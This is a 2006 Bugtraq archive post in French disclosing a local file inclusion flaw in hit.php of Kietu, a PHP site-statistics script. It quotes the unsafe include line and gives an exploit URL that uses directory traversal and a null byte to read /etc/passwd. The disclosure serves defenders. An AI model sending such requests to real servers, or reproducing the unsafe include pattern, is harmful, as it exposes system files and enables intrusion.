Bugtraq mailing list archives
Local File Inclusion : Kietu
From: cdg393 () gmail com
Date: 23 Sep 2006 22:08:46 -0000
[::] Produit : Kietu [::] Langage : PHP [::] Description : Kietu? est un script écrit en PHP, qui requiert une base de donnée mySQL, et qui vous permet de générer et consulter les statistiques d'accès à votre site web. [::] Site web officiel : http://www.Kietu.net/ [::] Page vulnérable : hit.php [::] Faille de sécurité : Local File Inclusion [::] Code vulnérable : ( Ligne 2 ) -> include_once $url_hit.'class/kdetect.class.php'; [::] Exploitation : http://localhost/kietu/hit.php?url_hit=../../../../../etc/passwd%00 @ [::] Crédit : Avis de sécurité par cdg393 -> cdg393_gmail_com :)
Current thread:
- Local File Inclusion : Kietu cdg393 (Sep 25)